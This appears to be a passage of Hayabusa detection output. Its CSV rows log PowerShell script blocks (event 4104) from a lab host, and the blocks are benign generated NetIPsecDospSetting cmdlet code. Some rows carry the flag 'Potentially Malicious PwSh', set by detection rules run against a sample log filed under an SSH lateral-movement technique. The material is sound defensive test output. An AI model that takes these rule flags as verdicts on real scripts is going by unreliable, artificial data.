'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetNa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"letization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetNa",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"me='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterEx",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"me='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { 